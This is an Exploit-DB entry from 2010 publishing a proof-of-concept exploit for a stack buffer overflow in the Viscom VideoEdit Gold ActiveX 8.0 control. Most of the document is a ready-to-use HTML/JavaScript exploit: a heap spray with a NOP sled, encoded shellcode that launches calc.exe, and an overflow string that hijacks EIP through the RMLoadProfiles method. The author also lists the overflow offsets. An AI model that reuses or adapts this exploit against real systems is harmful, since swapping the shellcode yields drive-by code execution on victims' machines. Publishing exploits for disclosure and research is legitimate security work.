Viscom VideoEdit Gold ActiveX 8.0 - Code Execution

EDB-ID:

15693

CVE:

N/A


Author:

Rew

Type:

local


Platform:

Windows

Date:

2010-12-06


<!--
 
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)
 
Impact is relatively low due to object not marked safe for scripting.  You'll
need to change the default IE settings to let it run.

This is a plain vanilla stack overflow.  The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH but here's the offsets just for kicks if you're interested.

[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
 
-->

<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>

<script>

// Ctrl+C Ctrl+V, herpderp

// calc.exe
var shellcode = unescape(
	'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
	'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
	'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
	'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
	'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
	'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
	'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
	'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
); 

var nops = unescape('%u9090%u9090');

var headersize = 20;
var slackspace = headersize + shellcode.length;

while(nops.length < slackspace) {
	nops += nops;
}

var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);

while((block.length + slackspace) < 0x50000) {
	block = block + block + fillblock;
}

memory=new Array();
for(counter=0; counter<200; counter++){
	memory[counter] = block + shellcode;
}

var bof = '';
while(bof.length < 2312){
	bof += 'A';
}
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP

document.getElementById('target').RMLoadProfiles( bof );

</script>